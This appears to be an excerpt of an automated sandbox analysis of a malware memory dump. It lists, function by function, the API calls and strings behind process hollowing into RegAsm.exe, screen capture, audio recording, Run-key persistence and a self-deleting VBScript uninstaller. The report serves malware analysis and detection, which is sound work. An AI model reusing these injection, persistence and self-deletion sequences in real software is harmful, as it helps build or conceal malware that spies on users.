Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

EnumSystemLocalesW.KERNEL32(00452254,00000001,?,?,004449AC,?,004525F5,004449AC,?,?,?,?,?,004449AC,?,?), ref: 00451FC3

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 70517d43b4834d2b39e75724c999b3c1fcf492dd8bbf48b98f78387c5afd5eb7
Instruction ID: faa2e26f21619674753b63803d444ebcdc18fb653b9977e4b6b54c84cafa8984
Opcode Fuzzy Hash: 70517d43b4834d2b39e75724c999b3c1fcf492dd8bbf48b98f78387c5afd5eb7
Instruction Fuzzy Hash: 2BF022363043086FDB145F3A9881B7BBB94EF80329F05442EFE058B691D7B5DC06C644

Uniqueness

Uniqueness Score: -1.00%

Function 004482C4 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004457C8: EnterCriticalSection.KERNEL32(-0006D41D,?,00442F1B,00000000,0046E928,0000000C,00442ED6,?,?,?,00445A66,?,?,0044818A,00000001,00000364), ref: 004457D7

EnumSystemLocalesW.KERNEL32(0044827E,00000001,0046EAD0,0000000C), ref: 004482FC

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 4b03c8790a3543633605fcd17a66047c3d30e6fd317312de70b0945699c1eca3
Instruction ID: 3e0b6544518826b1513a4e636f39db4c7c6778963d5a3a3654a3fb2fc2b31fc3
Opcode Fuzzy Hash: 4b03c8790a3543633605fcd17a66047c3d30e6fd317312de70b0945699c1eca3
Instruction Fuzzy Hash: E0F04435550200EFEB04EF69D946B4D77E0EB04725F10456AF414DB2A2CB7889808B59

Uniqueness

Uniqueness Score: -1.00%

Function 00451E91 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

EnumSystemLocalesW.KERNEL32(00451DE8,00000001,?,?,?,00452653,004449AC,?,?,?,?,?,004449AC,?,?,?), ref: 00451EC8

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 0f27a19467b537bc2edb91f12de862bc09ba8748d1eb205a07958a60be29cb7c
Instruction ID: f3168094b20094f9071e390e10ad46a9319e24188657ea19079ada7b49c20968
Opcode Fuzzy Hash: 0f27a19467b537bc2edb91f12de862bc09ba8748d1eb205a07958a60be29cb7c
Instruction Fuzzy Hash: CDF0553630020867CB04AF36C846B6BBF90EFC2722F06405EEE058B262C63AD846C754

Uniqueness

Uniqueness Score: -1.00%

Function 0040F81F Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,0041544A,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.2 Pro), ref: 0040F833

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

Uniqueness

Uniqueness Score: -1.00%

Function 0044FA8E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0044FA8E

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 53fe565ab6d979509c6e567c1bc4287925e93114ba9cccf385d2959bc0dfd0c1
Instruction ID: a36b04a886e7d418bd2d17bcf174589792a261d434d875a069037d791691f268
Opcode Fuzzy Hash: 53fe565ab6d979509c6e567c1bc4287925e93114ba9cccf385d2959bc0dfd0c1
Instruction Fuzzy Hash: 8BA01130200202CB8B008F33AA0820A3AAAAB00AA2300C038A00AC02A0EA2088808F28

Uniqueness

Uniqueness Score: -1.00%

Function 00418DC4 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418DDE
CreateCompatibleDC.GDI32(00000000), ref: 00418DEB

Part of subcall function 00419273: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 004192A3

CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418E61
DeleteDC.GDI32(00000000), ref: 00418E78
DeleteDC.GDI32(00000000), ref: 00418E7B
DeleteObject.GDI32(00000000), ref: 00418E7E
SelectObject.GDI32(00000000,00000000), ref: 00418E9F
DeleteDC.GDI32(00000000), ref: 00418EB0
DeleteDC.GDI32(00000000), ref: 00418EB3
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418ED7
GetIconInfo.USER32 ref: 00418F0B
DeleteObject.GDI32(?), ref: 00418F3A
DeleteObject.GDI32(?), ref: 00418F47
DrawIcon.USER32(00000000,?,?,?), ref: 00418F54
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00418F8A
GetObjectA.GDI32(00000000,00000018,?), ref: 00418FB6
LocalAlloc.KERNEL32(00000040,00000001), ref: 00419023
GlobalAlloc.KERNEL32(00000000,?), ref: 00419092
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004190B6
DeleteDC.GDI32(?), ref: 004190CA
DeleteDC.GDI32(00000000), ref: 004190CD
DeleteObject.GDI32(00000000), ref: 004190D0
GlobalFree.KERNEL32(?), ref: 004190DB
DeleteObject.GDI32(00000000), ref: 0041918F
GlobalFree.KERNEL32(?), ref: 00419196
DeleteDC.GDI32(?), ref: 004191A6
DeleteDC.GDI32(00000000), ref: 004191B1

Strings

DISPLAY, xrefs: 00418DD7

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 479521175-865373369
Opcode ID: 54eda4c38d6e83943b933f0922487bdf4f9de85190a38fb7e1d9866d6738ab1c
Instruction ID: e7c3367f6c681fa8515d566fd421d68283470b6e3bdb4c9c352ce811123ef30b
Opcode Fuzzy Hash: 54eda4c38d6e83943b933f0922487bdf4f9de85190a38fb7e1d9866d6738ab1c
Instruction Fuzzy Hash: 0FC14971508301AFD7209F25DC44BABBBE9EB88755F00482EF98993291DB34ED45CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041803D Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418084
GetProcAddress.KERNEL32(00000000), ref: 00418087
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418098
GetProcAddress.KERNEL32(00000000), ref: 0041809B
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004180AC
GetProcAddress.KERNEL32(00000000), ref: 004180AF
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004180C0
GetProcAddress.KERNEL32(00000000), ref: 004180C3
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418165
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041817D
GetThreadContext.KERNEL32(?,00000000), ref: 00418193
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004181B9
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041823B
TerminateProcess.KERNEL32(?,00000000), ref: 0041824F
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041828F
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418359
SetThreadContext.KERNEL32(?,00000000), ref: 00418376
ResumeThread.KERNEL32(?), ref: 00418383
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041839A
GetCurrentProcess.KERNEL32(?), ref: 004183A5
TerminateProcess.KERNEL32(?,00000000), ref: 004183C0
GetLastError.KERNEL32 ref: 004183C8

Strings

ZwCreateSection, xrefs: 0041806A
ZwMapViewOfSection, xrefs: 00418089
ZwUnmapViewOfSection, xrefs: 0041809D
ntdll, xrefs: 0041806F, 0041808E, 004180A2, 004180B6
ZwClose, xrefs: 004180B1

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 4188446516-3035715614
Opcode ID: 351650298d540e07d33211bf4070d990af1111825dfb992b7f52e155835243ae
Instruction ID: 4b3dbf9c3380ce27638f34cb54b94d9f6342d2977b347f3e8d94ef5a61c839a9
Opcode Fuzzy Hash: 351650298d540e07d33211bf4070d990af1111825dfb992b7f52e155835243ae
Instruction Fuzzy Hash: CBA17E70604305EFDB209F64DD85BAB7BE8FB48705F04082EF699D6291DB79D844CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D36E Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041279E: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F816), ref: 004127AE
Part of subcall function 0041279E: WaitForSingleObject.KERNEL32(000000FF), ref: 004127C1

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D46B
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D47E
SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D497
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D4C7

Part of subcall function 0040B7FA: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D006,004752D8,004752F0,?,pth_unenc), ref: 0040B809
Part of subcall function 0040B7FA: UnhookWindowsHookEx.USER32 ref: 0040B815
Part of subcall function 0040B7FA: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B823

Part of subcall function 0041C33F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C37E

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D712
ExitProcess.KERNEL32 ref: 0040D71E

Strings

0qF, xrefs: 0040D6DA, 0040D6E5
Temp, xrefs: 0040D4CE
while fso.FileExists(", xrefs: 0040D53A
fso.DeleteFolder ", xrefs: 0040D5F9
dMG, xrefs: 0040D3A9
\update.vbs, xrefs: 0040D4C9
"), xrefs: 0040D523
fso.DeleteFile ", xrefs: 0040D588
wend, xrefs: 0040D5D7
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D410
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D4F8
""", 0, xrefs: 0040D635
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D64F
On Error Resume Next, xrefs: 0040D507
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D6C1
0qF, xrefs: 0040D685, 0040D6C6, 0040D5AF, 0040D5DC
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D3BF
open, xrefs: 0040D70C
8SG, xrefs: 0040D41D
exepath, xrefs: 0040D445

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-332907002
Opcode ID: e8443b43686538b6e8672da5eeb48fdac103a2b16a56166c98a876f05d3a5a38
Instruction ID: 41ae5eec8d8c852c0cc3c178e0f1137f2a0bda96d0f509e590d0bd6d09efdebf
Opcode Fuzzy Hash: e8443b43686538b6e8672da5eeb48fdac103a2b16a56166c98a876f05d3a5a38
Instruction Fuzzy Hash: CB91B4716082005AC315FB62D892AAF77A9AF90309F10443FB54AA31E3FF7C9D49C65E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CFE4 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041279E: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F816), ref: 004127AE
Part of subcall function 0041279E: WaitForSingleObject.KERNEL32(000000FF), ref: 004127C1

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D0F3
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D106
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D136
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D145

Part of subcall function 0040B7FA: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D006,004752D8,004752F0,?,pth_unenc), ref: 0040B809
Part of subcall function 0040B7FA: UnhookWindowsHookEx.USER32 ref: 0040B815
Part of subcall function 0040B7FA: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B823

Part of subcall function 0041B8C6: GetCurrentProcessId.KERNEL32(00000000,65921986,00000000,?,?,?,?,00466468,0040D15B,.vbs,?,?,?,?,?,004752F0), ref: 0041B8ED

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D360
ExitProcess.KERNEL32 ref: 0040D367

Strings

Temp, xrefs: 0040D194
while fso.FileExists(", xrefs: 0040D216
fso.DeleteFolder ", xrefs: 0040D2D8
dMG, xrefs: 0040D01F
"), xrefs: 0040D1FF
fso.DeleteFile ", xrefs: 0040D263
wend, xrefs: 0040D2B2
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D086
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D1D3
hpF, xrefs: 0040D2DD
On Error Resume Next, xrefs: 0040D1E2
8SG, xrefs: 0040D0AC
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D30F
pth_unenc, xrefs: 0040CFEA
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D035
open, xrefs: 0040D35A
exepath, xrefs: 0040D0CF
.vbs, xrefs: 0040D14F

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-2557013105
Opcode ID: f698100dd29c094f1110f55b7c9a3a78bb98bfd1ed2432768d3e595de4a84509
Instruction ID: 8b66d43f73e9098c463d934601f02000e5e1a777e94df9333dfdffdf5747c3a2
Opcode Fuzzy Hash: f698100dd29c094f1110f55b7c9a3a78bb98bfd1ed2432768d3e595de4a84509
Instruction Fuzzy Hash: C381AF716082005BC719FB22D852AAF77A9AFD1308F10483FB14A671E2EF7C9D49C65E

Uniqueness

Uniqueness Score: -1.00%

Function 004123C3 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004123E2
ExitProcess.KERNEL32(00000000), ref: 004123EE
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412468
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412477
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412482
CloseHandle.KERNEL32(00000000), ref: 00412489
GetCurrentProcessId.KERNEL32 ref: 0041248F
PathFileExistsW.SHLWAPI(?), ref: 004124C0
GetTempPathW.KERNEL32(00000104,?), ref: 00412523
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041253D
lstrcatW.KERNEL32 ref: 0041254F

Part of subcall function 0041C33F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C37E

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041258F
Sleep.KERNEL32(000001F4), ref: 004125D0
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004125E5
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004125F0
CloseHandle.KERNEL32(00000000), ref: 004125F7
GetCurrentProcessId.KERNEL32 ref: 004125FD

Strings

.exe, xrefs: 00412543
WDH, xrefs: 00412496, 00412604
temp_, xrefs: 00412531
open, xrefs: 00412589
8SG, xrefs: 004123F4
exepath, xrefs: 0041241A

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: .exe$8SG$WDH$exepath$open$temp_
API String ID: 2649220323-436679193
Opcode ID: 9f2b8ccfe80d972c1099c6e698ebda80368bb01183b921761bdf034cc0064ffe
Instruction ID: 8ef474c935fd0aa6f7fd22daa97b647f48f9d568775161eff7735b799635912c
Opcode Fuzzy Hash: 9f2b8ccfe80d972c1099c6e698ebda80368bb01183b921761bdf034cc0064ffe
Instruction Fuzzy Hash: 0B51A671A00315BBDB10ABA09D99AEE336D9B04715F10446BF901E71D2EFBC8E85865D

Uniqueness

Uniqueness Score: -1.00%

Function 0041AF95 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B08A
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B09E
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B0C6
PathFileExistsW.SHLWAPI(00000000), ref: 0041B0DC
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B11D
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B135
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B14A
SetEvent.KERNEL32 ref: 0041B167
WaitForSingleObject.KERNEL32(000001F4), ref: 0041B178
CloseHandle.KERNEL32 ref: 0041B188
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B1AA
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B1B4

Strings

" type , xrefs: 0041B023
open ", xrefs: 0041B01E
alias audio, xrefs: 0041B006
close audio, xrefs: 0041B1AF
stopped, xrefs: 0041B150
NG, xrefs: 0041B057, 0041AFD9
pause audio, xrefs: 0041B118
stop audio, xrefs: 0041B1A5
play audio, xrefs: 0041B099
resume audio, xrefs: 0041B130
status audio mode, xrefs: 0041B145

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
API String ID: 738084811-2094122233
Opcode ID: 6b49dbd7e13132eb1746b376ac85614446d637539118fb37e93bdacc0088c0ea
Instruction ID: 48557ae7e310582626121f23f7169a642ba8ba4df6540ddaacaa5f45de19cc96
Opcode Fuzzy Hash: 6b49dbd7e13132eb1746b376ac85614446d637539118fb37e93bdacc0088c0ea
Instruction Fuzzy Hash: A65183B12442056AD315B731DC96EBB779CEB84359F10043FF14A621E2EF788D498A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7

Strings

fmt , xrefs: 00401B2D
WAVE, xrefs: 00401B1D
data, xrefs: 00401BB1
RIFF, xrefs: 00401AFD

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3

Uniqueness

Uniqueness Score: -1.00%

Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
GetProcAddress.KERNEL32(00000000), ref: 0040728D
GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
GetProcAddress.KERNEL32(00000000), ref: 004072A5
GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
GetProcAddress.KERNEL32(00000000), ref: 004072B9
GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
GetProcAddress.KERNEL32(00000000), ref: 004072CD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
GetProcAddress.KERNEL32(00000000), ref: 004072E1
GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
GetProcAddress.KERNEL32(00000000), ref: 004072F5

Strings

LdrEnumerateLoadedModules, xrefs: 004072EC
RtlInitUnicodeString, xrefs: 0040727E
RtlAcquirePebLock, xrefs: 004072C4
RtlReleasePebLock, xrefs: 004072D8
ntdll.dll, xrefs: 00407278, 00407283, 004072A1, 004072B5, 004072C9, 004072DD, 004072F1
NtFreeVirtualMemory, xrefs: 004072B0
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 00407271
NtAllocateVirtualMemory, xrefs: 0040729C

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
API String ID: 1646373207-351152038
Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D

Uniqueness

Uniqueness Score: -1.00%

Function 0044F36E Relevance: 30.2, APIs: 16, Strings: 1, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F400
_free.LIBCMT ref: 0044F426
_free.LIBCMT ref: 0044F44F
_free.LIBCMT ref: 0044F487
_free.LIBCMT ref: 0044F4B8
_free.LIBCMT ref: 0044F4F9
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044F57A
_free.LIBCMT ref: 0044F593
_free.LIBCMT ref: 0044F63C
_free.LIBCMT ref: 0044F662
_free.LIBCMT ref: 0044F68B
_free.LIBCMT ref: 0044F6C0
_free.LIBCMT ref: 0044F6F1
_free.LIBCMT ref: 0044F732
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F7B7
_free.LIBCMT ref: 0044F7D0

Strings

X8_, xrefs: 0044F3E0, 0044F438, 0044F44A, 0044F457, 0044F5E2, 0044F608, 0044F672, 0044F686, 0044F693, 0044F751

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

